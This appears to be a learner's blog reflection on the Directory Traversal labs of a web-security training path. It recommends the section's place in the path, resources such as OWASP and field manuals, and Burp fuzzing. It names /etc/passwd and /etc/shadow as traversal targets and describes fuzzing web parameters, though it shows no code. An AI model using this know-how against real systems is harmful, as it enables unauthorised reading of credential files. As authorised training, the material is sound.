Alright first things first, I would bump this to position 1 in the learning path. Why? Lower barrier to entry than the SQLi section (not everyone has done SQL, I think you’d be hard-pressed to find someone who has used a computer but hasn’t navigated through files and directories). The labs in this section were also very straightforward and could be completed with just the information in the content provided. There are also only 4 labs, which makes it easier to build momentum than the SQLi section. I understand starting with SQLi, but right now, I would start with
Directory Traversal and then do
Command Injection (I’ll touch on that one when I do the takeaways for that section). I may change things as I get through the other sections, and hopefully I’ll remember to put a recommended order up at some point.
I think the biggest takeaway I had from this section was to know where the default locations are for interesting files across operating systems. I remember when I first started looking at infosec stuff wondering about
/etc/passwd and how people knew to go there. Coming from a very Windows focused background, that gave me pause. The various team manuals available (Purple Team Field Manual,Blue Team Field Manual, Red Team Field Manual – which has a recent update to be Red Team Reference Manual) are good places to start. I haven’t dug through all mine to see what the differences are, but I’d get the purple team one to start if I didn’t have any. Just remember those are references NOT how-to books, so they don’t do you a ton of good if you aren’t sure at all what you need. This How To Geek article gives a good Linux overview. Mubix’s post-exploitation-wiki has the important file locations for Windows (and a bunch of other great information).
Otherwise, be sure to look at locations that aren’t necessarily high value – you might not be able to hit gold with
/etc/shadow, but you might be able to access other locations with valuable info. If you have the Web Application Hacker’s Handbook definitely review the associated section (path traversal). Burp Pro has a really good fuzzing list for directory traversal to automate some things easily. Also check out the OWASP resources. Of course, you should probably just have OWASP bookmarked anyways.
Scripting these labs wasn’t really a necessary thing, but I did anyways. I basically built a very simple fuzzing script by building 1 lab upon the next. I definitely have ideas of how to improve on what I have, but building them out this way way kind of fun and helped me approach the labs in Command Injection more efficiently. It also kind of helped internalize the things to try/look for with Directory Traversal. Being able to store different fuzzing options in Python lists and use them to target specific website parameters is helpful. I’m generally a fan of using available tooling when it works well (like Burp Pro – I’ve seen enough through 4 sections of the learning path that I would recommend finding a way to buy it) because it frees you up to do other things, but the practice on small things like this can help down the line when you need to customize things or want to build your own tools.
Short and sweet section. Fun labs that got the concept across. The entire section could be done with the Community version, but Pro would come in handy for the fuzzing aspect.